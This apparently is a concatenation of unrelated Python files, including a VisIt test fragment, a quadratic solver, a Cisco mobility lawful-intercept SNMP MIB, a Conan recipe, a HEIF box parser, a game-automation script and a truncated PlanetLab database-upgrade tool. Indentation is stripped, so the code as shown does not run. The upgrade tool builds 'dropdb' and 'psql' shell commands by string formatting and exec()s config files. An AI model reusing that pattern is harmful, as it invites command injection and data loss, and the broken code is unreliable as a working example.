# Show the Pseudocolor plot
hideplot(1)
showplot(2)
ChangeActivePlotsVar("nid2d")
Test("globalids_1_%02d" % ids[1])
ChangeActivePlotsVar("gnid2d")
Test("globalids_1_%02d" % ids[2])
ChangeActivePlotsVar("gzid2d")
Test("globalids_1_%02d" % ids[3])
SetActivePlots(0)
times = add_time(times)
# Take a step.
showplot(1)
step(sim)
idx = idx + ntests
TestText("globalids_1_%02d" % idx, times)
DeleteAllPlots()
def main():
# Create our simulation object.
sim = TestSimulation("globalids", "globalids.sim2")
sim.addargument("-echo")
# Test that we can start and connect to the simulation.
started, connected = TestSimStartAndConnect("globalids00", sim)
# Perform our tests.
if connected:
# Make sure the metadata is right.
TestSimMetaData("globalids01", sim.metadata())
test0(sim)
test1(sim)
# Close down the simulation.
if started:
sim.endsim()
main()
Exit()
| python |
import sys
import typing
def equation(a: int, b: int, c: int) -> typing.Tuple[int, int]:
x1 = (-1*b + (b ** 2 - 4 * a * c) ** 0.5) / (2 * a)
x2 = (-1*b - (b ** 2 - 4 * a * c) ** 0.5) / (2 * a)
return int(x1), int(x2)
def test() -> None:
assert equation(1, -3, -4) == (4, -1)
assert equation(13, 236, -396) == (1, -19)
assert equation(23, -116, 96) == (4, 1)
if __name__ == '__main__':
test()
args: typing.List[int] = []
if len(sys.argv) >= 4:
[print(x) for x in equation(int(sys.argv[1]),
int(sys.argv[2]),
int(sys.argv[3]))]
| python |
#
# PySNMP MIB module CISCO-MOBILITY-TAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-MOBILITY-TAP-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:07:50 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
cTap2StreamIndex, cTap2MediationContentId = mibBuilder.importSymbols("CISCO-TAP2-MIB", "cTap2StreamIndex", "cTap2MediationContentId")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Unsigned32, iso, TimeTicks, ModuleIdentity, Counter32, IpAddress, NotificationType, ObjectIdentity, MibIdentifier, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "TimeTicks", "ModuleIdentity", "Counter32", "IpAddress", "NotificationType", "ObjectIdentity", "MibIdentifier", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Integer32", "Gauge32")
TruthValue, TextualConvention, StorageType, DisplayString, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "StorageType", "DisplayString", "RowStatus")
ciscoMobilityTapMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 672))
ciscoMobilityTapMIB.setRevisions(('2010-06-16 00:00', '2010-04-15 00:00', '2008-08-05 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setRevisionsDescriptions(('Added a new textual convention: CmtapLawfulInterceptID. Added following three objects to cmtapStreamTable. cmtapStreamLIIdentifier. cmtapStreamLocationInfo. cmtapStreamInterceptType. Added the following new MODULE-COMPLIANCE. ciscoMobilityTapMIBComplianceRev01. Added the following new OBJECT-GROUP. ciscoMobilityTapStreamGroupSup1.', "Added enumeration 'servedMdn' for mtapStreamCapabilities object and CmtapSubscriberIDType.", 'Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setLastUpdated('201006160000Z')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setContactInfo('Cisco Systems Customer Service Postal:170 W. Tasman Drive San Jose, CA 95134 USA Tel:+1 800 553-NETS E-mail:[email protected]')
if mibBuilder.loadTexts: ciscoMobilityTapMIB.setDescription("This module manages Cisco's intercept feature for Mobility Gateway Products. This MIB is used along with CISCO-TAP2-MIB MIB to intercept Mobility Gateway traffic. CISCO-TAP2-MIB MIB along with specific filter MIBs like this MIB replace the CISCO-TAP-MIB MIB. To create a Mobility intercept, an entry cmtapStreamEntry is created which contains the filter details. An entry cTap2StreamEntry of CISCO-TAP2-MIB is created which is the common stream information for all kinds of intercepts and type of the specific stream is set to 'mobility' in this entry.")
ciscoMobilityTapMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 0))
ciscoMobilityTapMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 1))
ciscoMobilityTapMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2))
cmtapStreamGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1))
class CmtapLawfulInterceptID(TextualConvention, OctetString):
description = 'An octet string containing the Lawful Intercept Identifier (LIID)assigned to the intercepted target by a law enforcement agency defined by Communications Assistance for Law Enforcement Act (CALEA).'
status = 'current'
displayHint = '256a'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 256)
class CmtapSubscriberIDType(TextualConvention, Integer32):
description = "A value that represents the type of address that is used to identify a subscriber. The following types are currently supported: unknown: The Subscriber's identifier type is not known. msid: A Mobile Subscriber Identity (MSID). imsi: An International Mobile Subscriber Identity(IMSI) number. nai: A Network Access Identifier (NAI). esn: An Electronic Serial Number (ESN). servedMdn: Served Mdn(mobile directory number) is a vendor specific attribute. It is similar to the class IETF attribute. Refer to RFC 2865 for vendor specific attribute format. Example:dsg-mdn."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("unknown", 1), ("msid", 2), ("imsi", 3), ("nai", 4), ("esn", 5), ("servedMdn", 6))
class CmtapSubscriberID(TextualConvention, OctetString):
description = "An octet string containing a subscriber's identification, preferably in human-readable form. A CmtapStreamSubscriberID value is always interpreted within the context of an CmtapStreamSubscriberIDType value. Every usage of the CmtapStreamSubscriberID textual convention is required to specify the identity that corresponds to a CmtapStreamSubscriberIDType object."
status = 'current'
displayHint = '256a'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(3, 256)
cmtapStreamCapabilities = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 1), Bits().clone(namedValues=NamedValues(("tapEnable", 0), ("interface", 1), ("calledSubscriberID", 2), ("nonvolatileStorage", 3), ("msid", 4), ("imsi", 5), ("nai", 6), ("esn", 7), ("servedMdn", 8)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cmtapStreamCapabilities.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCapabilities.setDescription("This object indicates the Mobility Gateway intercept features that are implemented by this device and are manageable through this MIB. tapEnable: set if table entries with cTap2StreamInterceptEnable set to 'false' are used to pre-screen packets for intercept; otherwise these entries are ignored. interface: SNMP ifIndex Value may be used to select interception of all data crossing an interface or set of interfaces. nonvolatileStorage: The cmTapStreamTable supports the ability to store rows in nonvolatile memory. calledSubscriberID: The cmtapStreamCalledSubscriberID can be used to specify intercepts. Otherwise, this field is disabled. msid: A Mobile Subscriber Identity (MSID) can be used in the ID strings to specify intercepts. imsi: An International Mobile Subscriber Identity (IMSI) number can be used ID strings to specify intercepts. nai: A Network Access Identifier (NAI) can be used in the ID strings to specify intercepts. esn: An Electronic Serial Number (ESN) can be used in the ID strings to specify intercepts. servedMdn: Vendor specific attribute Served-Mobile Directory Number(MDN) can be used in the ID strings to specify intercepts.")
cmtapStreamTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2), )
if mibBuilder.loadTexts: cmtapStreamTable.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamTable.setDescription('The Mobility Stream Table lists the data streams to be intercepted. The same data stream may be required by multiple taps. This essentially provides options for packet selection, only some of which might be used. For example, if all the traffic to or from a subscriber is to be intercepted, one would configure an entry listing SubscriberID along with the SubscriberIDType corresponding to the stream that one wishes to intercept. The first index indicates which Mediation Device the intercepted traffic will be diverted to. The second index, which indicates the specific intercept stream, permits multiple classifiers to be used together. For example, an IP stream and a Mobility stream could both be listed in their respective tables, yet still correspond to the same Mediation Device entry. Entries are added to this table via cmtapStreamStatus in accordance with the RowStatus convention.')
cmtapStreamEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1), ).setIndexNames((0, "CISCO-TAP2-MIB", "cTap2MediationContentId"), (0, "CISCO-TAP2-MIB", "cTap2StreamIndex"))
if mibBuilder.loadTexts: cmtapStreamEntry.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamEntry.setDescription('A stream entry indicates a single data stream to be intercepted to a Mediation Device. Many selected data streams may go to the same application interface and many application interfaces are supported.')
cmtapStreamCalledSubscriberIDType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 1), CmtapSubscriberIDType().clone('unknown')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberIDType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberIDType.setDescription('Identifies the type of address that is stored in the cmtapStreamCalledSubscriberID string.')
cmtapStreamCalledSubscriberID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 2), CmtapSubscriberID()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberID.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberID.setDescription('A string used to identify the party being contacted. The type of this identification is determined by the cmtapStreamCalledSubscriberIDType object.')
cmtapStreamSubscriberIDType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 3), CmtapSubscriberIDType().clone('unknown')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamSubscriberIDType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamSubscriberIDType.setDescription('Identifies the type of address that is stored in the cmtapStreamSubscriberID string.')
cmtapStreamSubscriberID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 4), CmtapSubscriberID()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamSubscriberID.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamSubscriberID.setDescription('A string used to identify the subscriber to tap. The type of this indentification is determined by the cmtapStreamSubscriberIDType object.')
cmtapStreamStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 5), StorageType().clone('volatile')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamStorageType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamStorageType.setDescription("This object specifies the storage type of this conceptual row. If it is set to 'nonVolatile', this entry can be saved into non-volatile memory.")
cmtapStreamStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamStatus.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamStatus.setDescription("The status of this conceptual row. This object manages creation, modification, and deletion of rows in this table. When any field must be changed, cmtapStreamStatus must be first set to 'notInService'.")
cmtapStreamLIIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 7), CmtapLawfulInterceptID().clone('not set')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamLIIdentifier.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamLIIdentifier.setDescription('This object is an identifier assigned by a Law Enforcement Agency (LEA) to facilitate LI operations as defined in 3GPP TS 33.108 v8.7.0 standards document.')
cmtapStreamLocationInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 8), TruthValue().clone('true')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamLocationInfo.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamLocationInfo.setDescription('This object indicates, if the userLocationInfo object should be included in the Intercept Related Information (IRI) messages sent by the gateway to mediation gateway(s) for interception taps. The userLocationInfo is defined as part of the IRI messages in 3GPP 33.108 v8.7.0 standards document.')
cmtapStreamInterceptType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ccOnly", 1), ("iriOnly", 2), ("both", 3))).clone('both')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamInterceptType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamInterceptType.setDescription('This object indicates the intercept type of the tapped stream. The tap can be provisioned to intercept control messages (IRI) from the tapped stream, the payload (CC) messages from the tapped stream or both. The format of these messages in defined in 3GPP TS 33.108 v8.7.0 standards document. ccOnly(1) - Content of communication interception only. iriOnly(2) - Intercept Related Information only. both(3) - Intercept both: CC and IRI.')
ciscoMobilityTapMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1))
ciscoMobilityTapMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2))
ciscoMobilityTapMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1, 1)).setObjects(("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapCapabilityGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapMIBCompliance = ciscoMobilityTapMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: ciscoMobilityTapMIBCompliance.setDescription('The compliance statement for entities which implement the Cisco Intercept MIB for Mobility Gateways')
ciscoMobilityTapMIBComplianceRev01 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1, 2)).setObjects(("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapCapabilityGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroupSup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapMIBComplianceRev01 = ciscoMobilityTapMIBComplianceRev01.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapMIBComplianceRev01.setDescription('The compliance statement for entities which implement the Cisco Intercept MIB for Mobility Gateways.')
ciscoMobilityTapCapabilityGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 1)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCapabilities"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapCapabilityGroup = ciscoMobilityTapCapabilityGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapCapabilityGroup.setDescription('A collection of objects which provide Mobility Gateway capabilities for the system.')
ciscoMobilityTapStreamGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 2)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCalledSubscriberIDType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCalledSubscriberID"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamSubscriberIDType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamSubscriberID"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamStorageType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapStreamGroup = ciscoMobilityTapStreamGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapStreamGroup.setDescription('A collection of objects which provide information about the stream from which we wish to intercept packets.')
ciscoMobilityTapStreamGroupSup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 3)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamLIIdentifier"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamLocationInfo"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamInterceptType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapStreamGroupSup1 = ciscoMobilityTapStreamGroupSup1.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapStreamGroupSup1.setDescription('A collection of objects which provide additional information about the stream from which we wish to intercept packets.')
mibBuilder.exportSymbols("CISCO-MOBILITY-TAP-MIB", cmtapStreamInterceptType=cmtapStreamInterceptType, ciscoMobilityTapMIBConform=ciscoMobilityTapMIBConform, CmtapLawfulInterceptID=CmtapLawfulInterceptID, cmtapStreamStorageType=cmtapStreamStorageType, cmtapStreamGroup=cmtapStreamGroup, cmtapStreamCalledSubscriberIDType=cmtapStreamCalledSubscriberIDType, ciscoMobilityTapMIBNotifs=ciscoMobilityTapMIBNotifs, cmtapStreamCalledSubscriberID=cmtapStreamCalledSubscriberID, CmtapSubscriberID=CmtapSubscriberID, ciscoMobilityTapMIBComplianceRev01=ciscoMobilityTapMIBComplianceRev01, cmtapStreamTable=cmtapStreamTable, cmtapStreamSubscriberID=cmtapStreamSubscriberID, cmtapStreamEntry=cmtapStreamEntry, PYSNMP_MODULE_ID=ciscoMobilityTapMIB, ciscoMobilityTapStreamGroupSup1=ciscoMobilityTapStreamGroupSup1, cmtapStreamLocationInfo=cmtapStreamLocationInfo, cmtapStreamLIIdentifier=cmtapStreamLIIdentifier, ciscoMobilityTapStreamGroup=ciscoMobilityTapStreamGroup, ciscoMobilityTapMIBGroups=ciscoMobilityTapMIBGroups, cmtapStreamSubscriberIDType=cmtapStreamSubscriberIDType, cmtapStreamStatus=cmtapStreamStatus, ciscoMobilityTapMIBCompliance=ciscoMobilityTapMIBCompliance, ciscoMobilityTapMIB=ciscoMobilityTapMIB, ciscoMobilityTapMIBCompliances=ciscoMobilityTapMIBCompliances, cmtapStreamCapabilities=cmtapStreamCapabilities, ciscoMobilityTapCapabilityGroup=ciscoMobilityTapCapabilityGroup, CmtapSubscriberIDType=CmtapSubscriberIDType, ciscoMobilityTapMIBObjects=ciscoMobilityTapMIBObjects)
| python |
from conans import ConanFile, tools
class McapConan(ConanFile):
name = "mcap"
version = "0.0.1"
url = "https://github.com/foxglove/mcap"
homepage = "https://github.com/foxglove/mcap"
description = "A C++ implementation of the MCAP file format"
license = "Apache-2.0"
topics = ("mcap", "serialization", "deserialization", "recording")
settings = ("os", "compiler", "build_type", "arch")
requires = ("fmt/8.1.1", "lz4/1.9.3", "zstd/1.5.2")
generators = "cmake"
def validate(self):
tools.check_min_cppstd(self, "17")
def configure(self):
pass
def package(self):
self.copy(pattern="LICENSE", dst="licenses")
self.copy("include/*")
def package_id(self):
self.info.header_only()
| python |
# -----------------------------------
# import
# -----------------------------------
from .basebox import FullBox
from heifpy.file import BinaryFileReader
# -----------------------------------
# define
# -----------------------------------
# -----------------------------------
# function
# -----------------------------------
# -----------------------------------
# class
# -----------------------------------
class MovieHeaderBox(FullBox):
"""
ISO/IEC 14496-12
Box Type: ‘mvhd’
Container: Movie Box (‘moov’)
Mandatory: Yes
Quantity: Exactly One
"""
def __init__(self):
super(MovieHeaderBox, self).__init__()
self.creation_time = 0
self.modification_time = 0
self.timescale = 0
self.duration = 0
self.rate = 0
self.volume = 0
self.matrix = 0
self.predefined = 0
self.next_track_ID = 0
def parse(self, reader: BinaryFileReader) -> None:
super(MovieHeaderBox, self).parse(reader)
if self.get_version() == 1:
self.creation_time = reader.read64()
self.modification_time = reader.read64()
self.timescale = reader.read32()
self.duration = reader.read64()
else:
self.creation_time = reader.read32()
self.modification_time = reader.read32()
self.timescale = reader.read32()
self.duration = reader.read32()
self.rate = reader.read32()
self.volume = reader.read16()
reader.read16() # reserved
reader.read32() # reserved
reader.read32() # reserved
self.matrix = []
for _ in range(9):
self.matrix.append(reader.read32())
self.predefined = []
for _ in range(6):
self.predefined.append(reader.read32())
self.next_track_ID = reader.read32()
assert self.read_complete(reader), f'{self.type} num bytes left not 0.'
def print_box(self) -> None:
super(MovieHeaderBox, self).print_box()
print("creation_time :", self.creation_time)
print("modification_time :", self.modification_time)
print("timescale :", self.timescale)
print("duration :", self.duration)
print("rate :", self.rate)
print("volume :", self.volume)
print("matrix :", self.matrix)
print("predefined :", self.predefined)
print("next_track_ID :", self.next_track_ID)
# -----------------------------------
# main
# -----------------------------------
if __name__ == '__main__':
pass
| python |
import base64
def decode(data):
# adding extra = for padding if needed
pad = len(data) % 4
if pad > 0:
data += "=" * (4 - pad)
return base64.urlsafe_b64decode(data)
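# Example: "aGVsbG8" is the unpadded URL-safe base64 of b"hello"; its length is 7,
# so one "=" is appended (7 % 4 == 3) before decoding:
#   decode("aGVsbG8")  # -> b'hello'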
| python |
import screendetect
import os
import sys
import time
import keyboard
import pyautogui
import playsound
import pydirectinput
def play():
pass
def start():
time.sleep(3)
pydirectinput.click(900, 550)
pydirectinput.click(1239, 957)
pydirectinput.click(670, 1018)
screendetect.wait_for_screen('loading', 0.9)
time.sleep(0.5)
    playsound.playsound(os.getcwd() + '/media/sounds/xp.wav')  # call the function, not the module
def loop():
    keyboard.add_hotkey('q', sys.exit, args=(0,))  # args must be an iterable of arguments
start()
while True:
play()
if __name__ == '__main__':
loop() | python |
#!/usr/bin/env python3
#
# Tool for upgrading/converting a db
# Requirements:
# 1) Database Schema - schema for the new database you want to upgrade to
# 2) Config File - the config file that describes how to convert the db
#
# Notes:
# 1) Will attempt to convert the db defined in /etc/planetlab/plc_config
# 2) Does not automatically drop archived databases. They must be removed
# manually
import sys
import os
import getopt
import pgdb
config = {}
config_file = "/etc/planetlab/plc_config"
exec(compile(open(config_file).read(), config_file, 'exec'), config)
upgrade_config_file = "plcdb.3-4.conf"
schema_file = "planetlab4.sql"
temp_dir = "/tmp"
def usage():
print("Usage: %s [OPTION] UPGRADE_CONFIG_FILE " % sys.argv[0])
print("Options:")
print(" -s, --schema=FILE Upgraded Database Schema")
print(" -t, --temp-dir=DIR Temp Directory")
print(" --help This message")
sys.exit(1)
try:
(opts, argv) = getopt.getopt(sys.argv[1:],
"s:d:",
["schema=",
"temp-dir=",
"help"])
except getopt.GetoptError as err:
print("Error: ", err.msg)
usage()
for (opt, optval) in opts:
if opt == "-s" or opt == "--schema":
schema_file = optval
elif opt == "-d" or opt == "--temp-dir":
temp_dir = optval
elif opt == "--help":
usage()
try:
upgrade_config_file = argv[0]
except IndexError:
print("Error: too few arguments")
usage()
schema = {}
inserts = []
schema_items_ordered = []
sequences = {}
temp_tables = {}
# load conf file for this upgrade
try:
upgrade_config = {}
exec(compile(open(upgrade_config_file).read(), upgrade_config_file, 'exec'), upgrade_config)
upgrade_config.pop('__builtins__')
db_version_previous = upgrade_config['DB_VERSION_PREVIOUS']
db_version_new = upgrade_config['DB_VERSION_NEW']
except IOError as fault:
print("Error: upgrade config file (%s) not found. Exiting" % \
(fault))
sys.exit(1)
except KeyError as fault:
print("Error: %s not set in upgrade confing (%s). Exiting" % \
(fault, upgrade_config_file))
sys.exit(1)
def connect():
db = pgdb.connect(user = config['PLC_DB_USER'],
database = config['PLC_DB_NAME'])
return db
def archive_db(database, archived_database):
archive_db = " dropdb -U postgres %s > /dev/null 2>&1;" \
" psql template1 postgres -qc " \
" 'ALTER DATABASE %s RENAME TO %s;';" % \
(archived_database, database, archived_database)
exit_status = os.system(archive_db)
if exit_status:
print("Error: unable to archive database. Upgrade failed")
sys.exit(1)
#print "Status: %s has been archived. now named %s" % (database, archived_database)
def encode_utf8(inputfile_name, outputfile_name):
    # rewrite an iso-8859-1 encoded file as utf-8
    try:
        inputfile = open(inputfile_name, 'r', encoding='iso-8859-1')
        outputfile = open(outputfile_name, 'w', encoding='utf-8')
        for line in inputfile:
            if line.upper().find('SET CLIENT_ENCODING') > -1:
                continue
            outputfile.write(line)
        inputfile.close()
        outputfile.close()
    except:
        print('error encoding file')
        raise
def create_item_from_schema(item_name):
try:
(type, body_list) = schema[item_name]
exit_status = os.system('psql %s %s -qc "%s" > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'],"".join(body_list) ) )
if exit_status:
raise Exception
except Exception as fault:
print('Error: create %s failed. Check schema.' % item_name)
sys.exit(1)
raise fault
except KeyError:
print("Error: cannot create %s. definition not found in %s" % \
(key, schema_file))
return False
def fix_row(row, table_name, table_fields):
if table_name in ['interfaces']:
# convert str bwlimit to bps int
bwlimit_index = table_fields.index('bwlimit')
if isinstance(row[bwlimit_index], int):
pass
elif row[bwlimit_index].find('mbit') > -1:
row[bwlimit_index] = int(row[bwlimit_index].split('mbit')[0]) \
* 1000000
elif row[bwlimit_index].find('kbit') > -1:
row[bwlimit_index] = int(row[bwlimit_index].split('kbit')[0]) \
* 1000
elif table_name in ['slice_attribute']:
# modify some invalid foreign keys
attribute_type_index = table_fields.index('attribute_type_id')
if row[attribute_type_index] == 10004:
row[attribute_type_index] = 10016
elif row[attribute_type_index] == 10006:
row[attribute_type_index] = 10017
elif row[attribute_type_index] in [10031, 10033]:
row[attribute_type_index] = 10037
elif row[attribute_type_index] in [10034, 10035]:
row[attribute_type_index] = 10036
elif table_name in ['slice_attribute_types']:
type_id_index = table_fields.index('attribute_type_id')
if row[type_id_index] in [10004, 10006, 10031, 10033, 10034, 10035]:
return None
return row
def fix_table(table, table_name, table_fields):
    if table_name in ['slice_attribute_types']:
        # remove duplicate/redundant primary keys
        # (build a new list rather than removing rows while iterating)
        type_id_index = table_fields.index('attribute_type_id')
        table = [row for row in table
                 if row[type_id_index] not in [10004, 10006, 10031, 10033, 10034, 10035]]
    return table
def remove_temp_tables():
# remove temp_tables
try:
for temp_table in temp_tables:
os.remove(temp_tables[temp_table])
except:
raise
def generate_temp_table(table_name, db):
cursor = db.cursor()
try:
# get upgrade directions
table_def = upgrade_config[table_name].replace('(', '').replace(')', '').split(',')
table_fields, old_fields, joins, wheres = [], [], set(), set()
for field in table_def:
field_parts = field.strip().split(':')
table_fields.append(field_parts[0])
old_fields.append(field_parts[1])
if field_parts[2:]:
joins.update(set([x for x in field_parts[2:] if not x.find('=') > -1]))
wheres.update(set([x for x in field_parts[2:] if x.find('=') > -1]))
# get indices of fields that cannot be null
(type, body_list) = schema[table_name]
not_null_indices = []
for field in table_fields:
for body_line in body_list:
if body_line.find(field) > -1 and \
body_line.upper().find("NOT NULL") > -1:
not_null_indices.append(table_fields.index(field))
# get index of primary key
primary_key_indices = []
for body_line in body_list:
if body_line.find("PRIMARY KEY") > -1:
primary_key = body_line
for field in table_fields:
if primary_key.find(" "+field+" ") > -1:
primary_key_indices.append(table_fields.index(field))
#break
# get old data
get_old_data = "SELECT DISTINCT %s FROM %s" % \
(", ".join(old_fields), old_fields[0].split(".")[0])
for join in joins:
get_old_data = get_old_data + " INNER JOIN %s USING (%s) " % \
(join.split('.')[0], join.split('.')[1])
if wheres:
get_old_data = get_old_data + " WHERE "
for where in wheres:
get_old_data = get_old_data + " %s" % where
cursor.execute(get_old_data)
rows = cursor.fetchall()
# write data to a temp file
temp_file_name = '%s/%s.tmp' % (temp_dir, table_name)
temp_file = open(temp_file_name, 'w')
for row in rows:
# attempt to make any necessary fixes to data
row = fix_row(row, table_name, table_fields)
# do not attempt to write null rows
if row == None:
continue
# do not attempt to write rows with null primary keys
if [x for x in primary_key_indices if row[x] == None]:
continue
for i in range(len(row)):
# convert nulls into something pg can understand
                if row[i] == None:
                    if i in not_null_indices:
                        # XX doesn't work if column is int type
                        row[i] = ""
                    else:
                        row[i] = "\\N"
if isinstance(row[i], int) or isinstance(row[i], float):
row[i] = str(row[i])
# escape whatever can mess up the data format
if isinstance(row[i], str):
row[i] = row[i].replace('\t', '\\t')
row[i] = row[i].replace('\n', '\\n')
row[i] = row[i].replace('\r', '\\r')
data_row = "\t".join(row)
temp_file.write(data_row + "\n")
        temp_file.write("\\.\n")
temp_file.close()
temp_tables[table_name] = temp_file_name
except KeyError:
#print "WARNING: cannot upgrade %s. upgrade def not found. skipping" % \
# (table_name)
return False
except IndexError as fault:
print("Error: error found in upgrade config file. " \
"check %s configuration. Aborting " % \
(table_name))
sys.exit(1)
except:
print("Error: configuration for %s doesnt match db schema. " \
" Aborting" % (table_name))
try:
db.rollback()
except:
pass
raise
# Connect to current db
db = connect()
cursor = db.cursor()
# determine current db version
try:
cursor.execute("SELECT relname from pg_class where relname = 'plc_db_version'")
rows = cursor.fetchall()
if not rows:
print("Warning: current db has no version. Unable to validate config file.")
else:
cursor.execute("SELECT version FROM plc_db_version")
rows = cursor.fetchall()
if not rows or not rows[0]:
print("Warning: current db has no version. Unable to validate config file.")
elif rows[0][0] == db_version_new:
print("Status: Versions are the same. No upgrade necessary.")
sys.exit()
elif not rows[0][0] == db_version_previous:
